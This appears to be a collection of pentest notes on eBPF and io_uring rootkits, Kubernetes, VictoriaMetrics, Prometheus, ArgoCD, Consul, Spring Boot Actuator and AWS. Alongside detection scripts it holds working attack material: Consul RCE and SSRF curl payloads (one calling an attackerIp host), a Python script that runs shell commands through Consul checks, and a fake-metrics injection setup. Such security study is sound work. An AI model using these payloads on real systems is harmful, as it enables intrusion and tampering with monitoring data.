eBPF
eBPF: A new frontier for malware
* What is eBPF?
* Lifetime of an eBPF program
* kprobes, uprobes, and tracepoints
* eXpress Data Path (XDP)
* Traffic Control (TC)
* Prevention
* Detection
bad-bpf - A collection of eBPF programs demonstrating bad behavior, presented at DEF CON 29
ebpfkit - rootkit powered by eBPF
With Friends Like eBPF, Who Needs Enemies? - Black Hat USA 2021 research
Red Canary
eBPF: A new frontier for malware | Red Canary
Extended Berkeley Packet Filter (eBPF) is beginning to transform the Linux malware landscape. Here's what defenders should look out for.
I got interested in eBPF, so as an experiment I decided to build this project: https://github.com/cotsom/eBPF-rootkit/
* Backdoor triggered by sending a passphrase inside a TCP packet
* Hiding a process PID (this functionality is taken from bad-bpf, but the loader was rewritten in Go)
On PID hiding there are good articles that walk through the example the code was taken from:
eBPF program creation in practice – PID concealment (Part 1)
eBPF in practice – PID concealment (Part 2)
GitHub
GitHub - cotsom/eBPF-rootkit: eBPF backdoor with PID hiding
eBPF backdoor with PID hiding. Contribute to cotsom/eBPF-rootkit development by creating an account on GitHub.
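On the detection side, as an added example that is not part of this post or of the eBPF-rootkit project: the PID-hiding code borrowed from bad-bpf works by hooking the getdents64 syscall tracepoints (that is how /proc listings are read), so any loaded eBPF program attached at those points is a strong indicator. The script below joins the output of `bpftool prog show -j` with `bpftool perf show -j` (or `bpftool link show -j` for link-based attachments) and reports the offending programs. The JSON field names assumed for bpftool ("tracepoint", "func", "prog_id", "pid") are my recollection of its output, and the sample data is constructed, so treat both as assumptions to verify against your bpftool version.

```python
import json
import subprocess

# Attach points a PID-hiding eBPF rootkit needs: process listings are built
# from directory reads of /proc, so bad-bpf's pidhide hooks the getdents64
# syscall tracepoints. The raw kprobe symbol is the x86-64 syscall wrapper;
# other architectures use another prefix (assumption: extend for your platform).
SUSPICIOUS_HOOKS = (
    "sys_enter_getdents64",
    "sys_exit_getdents64",
    "__x64_sys_getdents64",
)


def parse_bpftool(output: str) -> list:
    """`bpftool -j ...` prints one JSON array; anything else is treated as empty."""
    data = json.loads(output or "[]")
    return data if isinstance(data, list) else []


def attach_point(entry: dict) -> str:
    """Hook name of one attachment entry. Assumption about bpftool's JSON:
    tracepoints are reported under "tracepoint", kprobes/uprobes under "func",
    in both `perf show` and `link show` output."""
    return entry.get("tracepoint") or entry.get("func") or ""


def find_getdents_hooks(prog_json: str, attach_json: str) -> list:
    """Join `bpftool prog show -j` with `bpftool perf show -j` / `link show -j`
    and return every program hooked on getdents64."""
    progs = {p.get("id"): p for p in parse_bpftool(prog_json)}
    findings = []
    for entry in parse_bpftool(attach_json):
        name = attach_point(entry)
        if not any(name.endswith(h) for h in SUSPICIOUS_HOOKS):
            continue
        prog = progs.get(entry.get("prog_id"), {})
        findings.append({
            "prog_id": entry.get("prog_id"),
            "prog_name": prog.get("name", "?"),
            "prog_type": prog.get("type", "?"),
            "attached_to": name,
            "holder_pid": entry.get("pid"),  # process keeping the fd open (the loader)
        })
    return findings


def bpftool(*args: str) -> str:
    """Run bpftool with JSON output; needs root or CAP_BPF + CAP_PERFMON."""
    return subprocess.run(["bpftool", "-j", *args],
                          capture_output=True, text=True, check=True).stdout


# Constructed sample output (not captured from a real host) for offline runs.
SAMPLE_PROGS = json.dumps([
    {"id": 42, "type": "tracepoint", "name": "handle_getdents_exit", "tag": "0f1e2d3c4b5a6978"},
    {"id": 43, "type": "tracepoint", "name": "handle_getdents_enter", "tag": "1111222233334444"},
    {"id": 8, "type": "tracepoint", "name": "trace_exec", "tag": "aaaabbbbccccdddd"},
])
SAMPLE_ATTACH = json.dumps([
    {"pid": 1337, "fd": 9, "prog_id": 42, "fd_type": "tracepoint", "tracepoint": "syscalls/sys_exit_getdents64"},
    {"pid": 1337, "fd": 8, "prog_id": 43, "fd_type": "tracepoint", "tracepoint": "syscalls/sys_enter_getdents64"},
    {"pid": 900, "fd": 5, "prog_id": 8, "fd_type": "tracepoint", "tracepoint": "sched/sched_process_exec"},
])


if __name__ == "__main__":
    try:
        progs = bpftool("prog", "show")
        hits = find_getdents_hooks(progs, bpftool("perf", "show"))
        hits += find_getdents_hooks(progs, bpftool("link", "show"))
    except (FileNotFoundError, subprocess.CalledProcessError):
        print("bpftool unavailable, using constructed sample data")
        hits = find_getdents_hooks(SAMPLE_PROGS, SAMPLE_ATTACH)
    seen = set()
    for h in hits:
        if (h["prog_id"], h["attached_to"]) in seen:
            continue
        seen.add((h["prog_id"], h["attached_to"]))
        print(f"[!] prog {h['prog_id']} ({h['prog_type']}/{h['prog_name']}) "
              f"hooks {h['attached_to']}, held by pid {h['holder_pid']}")
    if not hits:
        print("no eBPF programs attached to getdents64")
```

Both attachment sources are queried because legacy loaders hold a perf-event fd (visible to `bpftool perf`) while libbpf-based loaders attach through bpf_link (visible to `bpftool link`); a rootkit that pins its programs and exits will still show up in `bpftool prog`, just without a holder pid.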
Post-exploiting a compromised etcd – Full control over the kubernetes cluster and its nodes
* Persistence
* Resources hiding
* Bypassing AdmissionControllers
Curing
Curing is a POC of a rootkit that uses io_uring to perform different tasks without using any syscalls
* Read files
* Write files
* Create symbolic links
* C2 server communication
Linux io_uring problems - Link
GitHub
GitHub - armosec/curing: io_uring based rootkit
io_uring based rootkit. Contribute to armosec/curing development by creating an account on GitHub.
GRPCUI
A command-line tool that lets you interact with gRPC servers via a browser.
If the server has reflection enabled, grpcui will automatically detect the available methods.
# If you have the .proto file
grpcui -proto service.proto -plaintext grpc-address:50051
# If the service has reflection enabled
grpcui -plaintext grpc-address:50051
Useful for
* Testing via Burp
* Using sqlmap & the like
* Supports proxying via proxychains
GitHub
GitHub - fullstorydev/grpcui: An interactive web UI for gRPC, along the lines of postman
An interactive web UI for gRPC, along the lines of postman - fullstorydev/grpcui
eBPF rootkit reverse
* Introduction to eBPF
* How are eBPF programs built and loaded?
* Reversing eBPF rootkit
Link
ARMO
Reverse Engineering eBPF Programs: A Deep Dive
Explore how eBPF technology works by reverse engineering eBPF-based programs. Learn about its internals, benefits, and applications in modern computing
Node Post-Exploitation
After escaping to the worker node, you have access to all containers located on it.
The script can-they.sh automatically collects the service account tokens of the other pods and checks whether any of them has the permission you are looking for (instead of you checking them one by one):
./can-they.sh -i "--list -n default"
./can-they.sh -i "list secrets -n kube-system"
GitHub
badPods/scripts/can-they.sh at main · BishopFox/badPods
A collection of manifests that will create pods with elevated privileges. - BishopFox/badPods
VictoriaMetrics
If you find a VictoriaMetrics cluster whose components are not placed behind vmauth (the service for authentication and proxying to the other components, see the wiki), you can not only read all the collected metrics but also forge them by pushing your own.
1) Run your own Prometheus and specify in its configuration:
global:
  scrape_interval: 10s
scrape_configs:
  - job_name: 'redteam'
    metrics_path: /metrics
    static_configs:
      - targets: ['redteam.ru:9100'] # the target we want to impersonate
remote_write:
  - url: "http://host:8429/api/v1/write" # the service that accepts metrics, e.g. vmagent
In the Prometheus container, add an /etc/hosts entry for redteam.ru pointing at our web server that serves the metrics.
2) Run a web server that will serve the fake metrics:
import http.server
import socketserver

PORT = 9100  # must match the port of the target in the Prometheus config

# Fake payload in the Prometheus text exposition format; the job label
# should match the job_name whose data you want to overwrite.
METRICS = """\
# HELP cpu_usage Test metric
# TYPE cpu_usage gauge
cpu_usage{job="redteam"} 0.64
""".encode('utf-8')


class MetricsHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/metrics':
            self.send_response(200)
            # version=0.0.4 is the text format version Prometheus expects
            self.send_header("Content-type", "text/plain; version=0.0.4; charset=utf-8")
            self.send_header("Content-Length", str(len(METRICS)))
            self.end_headers()
            self.wfile.write(METRICS)
        else:
            self.send_response(404)
            self.end_headers()


socketserver.TCPServer.allow_reuse_address = True  # restart without waiting for TIME_WAIT
with socketserver.TCPServer(("", PORT), MetricsHandler) as httpd:
    print("serving metrics at port", PORT)
    httpd.serve_forever()
3) Every 10 seconds Prometheus will scrape the metrics and forward them to the URL given in remote_write. This way you can specify an existing job_name together with an existing target of that job, and inject into the data that Grafana displays for that instance.
Web3 Security Resources Hub - a collection of curated tools, guides, and best practices for securing decentralized systems and smart contracts in the blockchain space
* Roadmaps & Learning Paths
* Smart Contract Programming Best Practices
* Audit Reports
* Security Checklists
* CTFs & Challenges
* Exploit Repositories
etc...
GitHub
GitHub - Raiders0786/web3-security-resources: The Web3 Security Resources Hub is a comprehensive collection of curated tools, guides…
The Web3 Security Resources Hub is a comprehensive collection of curated tools, guides, and best practices for securing decentralized systems and smart contracts in the blockchain space. - Raiders0...
ADFS Post-Exploitation
How to access cloud systems outside domain - Introduction to the SAML attack against ADFS
Tools
* ADFSDump - Dump decryption private keys and other sorts of goodies from AD FS
* ADFSpoof - A python tool to forge AD FS security tokens
Orangecyberdefense
The Golden SAML Attack Against ADFS.
Attackers can determine if there are any ADFS installations and proceed to access these with the intent to extract sensitive information from those hosts.
Prometheus pentest
Exposed administration interfaces
Prometheus provides an optional management API which can be enabled via the command-line flags web.enable-admin-api and web.enable-lifecycle. These endpoints allow deletion of all stored metrics and shutting down the monitoring server, respectively. They are disabled by default, but in an insecure deployment an attacker can query their state from the API endpoint /api/v1/status/flags to check whether they have been enabled manually:
{
  "status": "success",
  "data": {
    "web.enable-admin-api": "true",
    "web.enable-lifecycle": "false"
  }
}
Targets disclosure
API endpoint /api/v1/targets exposes the services belonging to the infrastructure, including their roles and labels. The endpoint also exposes the metadata labels added by the target provider (service discovery). These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in them. Dangerous labels with possible sensitive information disclosure, e.g.:
__meta_gce_metadata_ssh_keys
__meta_gce_metadata_startup_script
__meta_gce_metadata_kube_env
__meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration
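The two checks above in one script, as an added example (not code from the post or from the JFrog article): it reads /api/v1/status/flags and /api/v1/targets, flags the dangerous management flags that are enabled, and scans both the discovered (pre-relabeling, where the __meta_* labels live) and final labels of every active target for the label names listed above. The generic secret-looking name patterns and the sample responses are my additions; the response shapes follow the Prometheus HTTP API.

```python
import json
import re
import sys
import urllib.request

# Flags from the post: either one turns an exposed server into a destructive primitive.
DANGEROUS_FLAGS = {
    "web.enable-admin-api": "admin API on: /api/v1/admin/tsdb/delete_series can wipe stored data",
    "web.enable-lifecycle": "lifecycle API on: POST /-/quit and /-/reload without auth",
}

# Label names from the post's list plus generic secret-looking names (my addition).
SENSITIVE_LABEL_PATTERNS = [
    r"^__meta_gce_metadata_ssh_keys$",
    r"^__meta_gce_metadata_startup_script$",
    r"^__meta_gce_metadata_kube_env$",
    r"^__meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration$",
    r"(password|passwd|secret|token|api_?key|private_?key)",
]


def enabled_dangerous_flags(flags_response: dict) -> dict:
    """From GET /api/v1/status/flags: dangerous flags whose value is "true"."""
    data = flags_response.get("data", {})
    return {flag: why for flag, why in DANGEROUS_FLAGS.items() if data.get(flag) == "true"}


def sensitive_labels(targets_response: dict) -> list:
    """From GET /api/v1/targets: (job, scrapeUrl, label, value) for every label whose
    name matches a sensitive pattern. discoveredLabels holds the raw __meta_* labels
    before relabeling, which is where the cloud metadata ends up."""
    hits = []
    for target in targets_response.get("data", {}).get("activeTargets", []):
        job = target.get("labels", {}).get("job", "?")
        url = target.get("scrapeUrl", "?")
        for label_set in (target.get("discoveredLabels", {}), target.get("labels", {})):
            for name, value in label_set.items():
                if any(re.search(p, name, re.IGNORECASE) for p in SENSITIVE_LABEL_PATTERNS):
                    hits.append((job, url, name, value))
    return hits


def fetch_json(base_url: str, path: str) -> dict:
    with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=10) as resp:
        return json.load(resp)


# Constructed sample responses (not from a real server) in the real API shape.
SAMPLE_FLAGS = {"status": "success",
                "data": {"web.enable-admin-api": "true", "web.enable-lifecycle": "false"}}
SAMPLE_TARGETS = {"status": "success", "data": {"activeTargets": [{
    "discoveredLabels": {"__address__": "10.0.0.5:9100",
                         "__meta_gce_instance_name": "node-1",
                         "__meta_gce_metadata_startup_script": "#!/bin/sh\nexport DB_PASS=hunter2"},
    "labels": {"instance": "10.0.0.5:9100", "job": "node"},
    "scrapeUrl": "http://10.0.0.5:9100/metrics", "health": "up"}], "droppedTargets": []}}


if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python3 prom_check.py http://prometheus:9090
        flags = fetch_json(sys.argv[1], "/api/v1/status/flags")
        targets = fetch_json(sys.argv[1], "/api/v1/targets")
    else:
        flags, targets = SAMPLE_FLAGS, SAMPLE_TARGETS
    for flag, why in enabled_dangerous_flags(flags).items():
        print(f"[!] {flag}: {why}")
    for job, url, name, value in sensitive_labels(targets):
        print(f"[!] job={job} {url} {name}={value[:60]!r}")
```

Only label names are matched, so a secret stored under an innocuous-looking annotation name will not be caught; the output is meant to point you at targets worth reading in full, not to replace reading /api/v1/targets yourself.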
Articles:
* Don’t let Prometheus Steal your Fire
* How attackers use exposed Prometheus server to exploit Kubernetes clusters
JFrog
Don’t let Prometheus Steal your Fire
How to deploy & configure Prometheus securely, including authentication and encryption capabilities. Real-world exposures discovered by the JFrog Security Research team
Openstack pentest
Articles
OpenStack from a penetration tester perspective
Part 1
Part 2
Part 3
Tool
openstack-security-tool
Medium
OpenStack from a penetration tester perspective: Part 1
Hello everyone,
ArgoCD - Declarative, GitOps tool for continuous delivery on Kubernetes
Template for deploying pod and code execution within a cluster - Link
CVE-2024-31989
* Use of Risky or Missing Cryptographic Algorithms in Redis Cache (Summary & PoC)
* Redis or Not – Revealing a Critical Vulnerability in Argo CD Kubernetes Controller
CVE-2025-55190
Argo CD's Project API Token Exposes Repository Credentials
curl -sH "Authorization: Bearer $ARGOCD_API_TOKEN" \
"https://argocd.example.com/api/v1/projects/myProject/detailed"
Hardening
* Six Critical Blindspots While Securing Argo CD
* Securing Multi-Cluster ArgoCD
* Securing Continuous Delivery: Argo CD Threat Detection
GitHub
GitHub - cotsom/argocd-helloapp
Contribute to cotsom/argocd-helloapp development by creating an account on GitHub.
Consul
SSRF
Register agent
curl -X PUT -H "Content-Type: application/json" -d '{
"ID": "testservice",
"Name": "testservice",
"Address": "127.0.0.1",
"Port": 80,
"check": {
"HTTP": "http://attackerIp:attackerPort",
"interval": "10s"
}
}' http://consul-host:8500/v1/agent/service/register
RCE
Register agent
curl -X PUT -H "Content-Type: application/json" -d '{
"ID": "testservice",
"Name": "testservice",
"Address": "127.0.0.1",
"Port": 80,
"check": {
"Args": ["/bin/sh", "-c", "id"],
"interval": "10s"
}
}' http://consul-host:8500/v1/agent/service/register
Agents
Get check output
curl http://consul-host:8500/v1/agent/checks | jq
Unregister agent
curl http://consul-host:8500/v1/agent/service/deregister/testservice -X PUT
Article - Consul by HashiCorp: from Infoleak to RCE
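The register / read check output / deregister chain above as one script, added here as an example (not code from the post or from the Wallarm article). The same registration body serves both variants: an HTTP check makes the agent fetch a URL on every interval (SSRF), a script check makes it run a command (RCE). The agent address and service id are assumptions; the sample /v1/agent/checks response is constructed.

```python
import json
import time
import urllib.request

CONSUL = "http://consul-host:8500"  # assumed: unauthenticated agent HTTP API


def registration(service_id: str, check: dict, interval: str = "10s") -> dict:
    """Body for PUT /v1/agent/service/register, same shape as the curl calls above."""
    return {"ID": service_id, "Name": service_id, "Address": "127.0.0.1",
            "Port": 80, "check": {**check, "interval": interval}}


def http_check(url: str) -> dict:
    """SSRF: the agent itself GETs `url` every interval; status and body land in Output."""
    return {"HTTP": url}


def script_check(cmd: str) -> dict:
    """RCE: the agent runs the command every interval. Only works when the agent runs
    with enable_script_checks / enable_local_script_checks (off by default since 1.0)."""
    return {"Args": ["/bin/sh", "-c", cmd]}


def check_result(checks: dict, service_id: str):
    """From GET /v1/agent/checks (a dict keyed by CheckID) return (Status, Output)
    of the check that belongs to service_id."""
    for check in checks.values():
        if check.get("ServiceID") == service_id:
            return check.get("Status"), check.get("Output", "")
    return None, ""


def api(method: str, path: str, body=None):
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(CONSUL + path, data=data, method=method,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        raw = resp.read()
        return json.loads(raw) if raw else None


def run_via_check(cmd: str, service_id: str = "rtcheck", wait: int = 12) -> str:
    """Register a script check, wait past one interval, collect its output, and
    deregister so nothing stays behind in the catalog (also stops the check rerunning)."""
    api("PUT", "/v1/agent/service/register", registration(service_id, script_check(cmd)))
    try:
        time.sleep(wait)  # the first run is staggered somewhere inside the interval
        _, output = check_result(api("GET", "/v1/agent/checks"), service_id)
    finally:
        api("PUT", f"/v1/agent/service/deregister/{service_id}")
    return output


# Constructed sample of /v1/agent/checks after a script check ran `id`.
SAMPLE_CHECKS = {"service:rtcheck": {
    "Node": "consul-1", "CheckID": "service:rtcheck", "Name": "Service 'rtcheck' check",
    "Status": "passing", "Output": "uid=100(consul) gid=1000(consul) groups=1000(consul)\n",
    "ServiceID": "rtcheck", "ServiceName": "rtcheck"}}


if __name__ == "__main__":
    print(run_via_check("id"))
```

Two things to check before blaming the script when Output stays empty: with ACLs in default-deny mode the register call fails with 403, and without enable_script_checks the agent rejects the Args check at registration time, so the HTTP variant is the one to try first.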
Wallarm
Consul by HashiCorp: from Infoleak to RCE
Basically, Consul ensures the coherence of system components and the trust between them. Consul is at the core of your system.
Spring Boot Actuator
Article
Under the Radar: Exploring Spring Boot Actuator Misconfigurations
* What makes Spring Boot Actuator a treasure trove for attackers?
* Common Misconfigurations in Spring Boot Actuator
#1 Exposed HeapDump file
#2 Exposed Actuator Gateway Endpoint leading to RCE
#3 Exposed env endpoint
* How Can Organizations Defend Themselves?
Recon
* /actuator - List of all available actuator endpoints
* /actuator/mappings - All URL mappings (controllers and handlers), request → method mappings
* /actuator/beans - Shows registered Spring beans
* /actuator/configprops - Values and sources of @ConfigurationProperties beans
Exploitation
* /actuator/heapdump - Exposed HeapDump file
* /actuator/env - Expose details about the runtime environment
* /actuator/httptrace - Leakage of payload structures, internal URLs, possible query data
* /actuator/loggers - Shows current logging levels and (if enabled) allows you to change logger levels at runtime
* /actuator/gateway/routes - SSRF; can lead to RCE (CVE-2022-22947, Spring Cloud Gateway SpEL injection via the routes API)
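The recon and exploitation lists above as a small classifier, added here as an example (not code from the post or from the Wiz article): GET /actuator returns a HAL document whose `_links` keys are the endpoint ids, so one request tells you which of the interesting endpoints are exposed. The script buckets them by the lists above, collapses templated sub-links (env-toMatch → env), and falls back to probing the Spring Boot 1.x root paths when /actuator is missing. The sample index is constructed and the 1.x fallback list is my assumption, not a complete one.

```python
import json
import sys
import urllib.error
import urllib.request

RECON = {
    "mappings": "every URL -> handler mapping (attack surface map)",
    "beans": "registered Spring beans",
    "configprops": "@ConfigurationProperties values and their sources",
}
EXPLOIT = {
    "heapdump": "JVM heap snapshot: credentials, tokens, session data in memory",
    "env": "runtime environment and properties, often with secrets",
    "httptrace": "recent requests: internal URLs, payload shapes, query data",
    "loggers": "log levels; POST changes them at runtime",
    "gateway": "Spring Cloud Gateway routes: SSRF, RCE via CVE-2022-22947 on unpatched versions",
}


def classify_index(index: dict) -> dict:
    """Classify the `_links` of GET /actuator into recon / exploit / other endpoint ids,
    mapping each id to its href. Templated sub-links such as "env-toMatch" count as
    their base endpoint and the first (plain) href seen wins."""
    buckets = {"recon": {}, "exploit": {}, "other": {}}
    for link_id, link in index.get("_links", {}).items():
        endpoint = link_id.split("-", 1)[0]
        if endpoint == "self":
            continue
        bucket = "exploit" if endpoint in EXPLOIT else "recon" if endpoint in RECON else "other"
        buckets[bucket].setdefault(endpoint, link.get("href", ""))
    return buckets


def probe(base_url: str) -> dict:
    """Fetch /actuator (Boot 2.x+); on an HTTP error fall back to probing the
    Boot 1.x root paths one by one (assumption: only the ids above are tried)."""
    base = base_url.rstrip("/")
    try:
        with urllib.request.urlopen(base + "/actuator", timeout=10) as resp:
            return classify_index(json.load(resp))
    except urllib.error.HTTPError:
        found = {"recon": {}, "exploit": {}, "other": {}}
        for endpoint in list(RECON) + list(EXPLOIT):
            try:
                with urllib.request.urlopen(f"{base}/{endpoint}", timeout=10) as resp:
                    if resp.status == 200:
                        bucket = "exploit" if endpoint in EXPLOIT else "recon"
                        found[bucket][endpoint] = f"{base}/{endpoint}"
            except urllib.error.URLError:
                pass
        return found


# Constructed sample of GET /actuator (not from a real application).
SAMPLE_INDEX = {"_links": {
    "self": {"href": "http://app.example/actuator", "templated": False},
    "health": {"href": "http://app.example/actuator/health", "templated": False},
    "env": {"href": "http://app.example/actuator/env", "templated": False},
    "env-toMatch": {"href": "http://app.example/actuator/env/{toMatch}", "templated": True},
    "heapdump": {"href": "http://app.example/actuator/heapdump", "templated": False},
    "mappings": {"href": "http://app.example/actuator/mappings", "templated": False},
    "gateway": {"href": "http://app.example/actuator/gateway", "templated": False},
}}


if __name__ == "__main__":
    result = probe(sys.argv[1]) if len(sys.argv) > 1 else classify_index(SAMPLE_INDEX)
    for bucket in ("exploit", "recon", "other"):
        for endpoint, href in result[bucket].items():
            why = EXPLOIT.get(endpoint) or RECON.get(endpoint) or "-"
            print(f"[{bucket}] {endpoint:12} {href}  {why}")
```

Exposure of the index alone is not proof that each listed endpoint answers without auth; security filters are often applied per path, so confirm each "exploit" hit with a direct request before reporting it.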
wiz.io
Exploring Spring Boot Actuator Misconfigurations | Wiz Blog
Misconfigurations in Spring Boot Actuator’s endpoints can leak environment variables, passwords, and API keys, and even lead to remote code execution.
AWS pwn
A collection of scripts for AWS penetration testing. Contains sets of scripts for:
* Reconnaissance - Things to do with pre-compromise information gathering.
* Exploitation - Things that will help you gain a foothold in an account.
* Stealth - Things that might help you stay hidden after compromising an account.
* Exploration - Things to help you understand what you've pwned.
* Elevation - Things to help you move around an account and gather different levels of access.
* Persistence - Things to help maintain your access to an account.
* Exfiltration - Things to help you extract and move data around in AWSy ways.
GitHub
GitHub - dagrz/aws_pwn: A collection of AWS penetration testing junk
A collection of AWS penetration testing junk. Contribute to dagrz/aws_pwn development by creating an account on GitHub.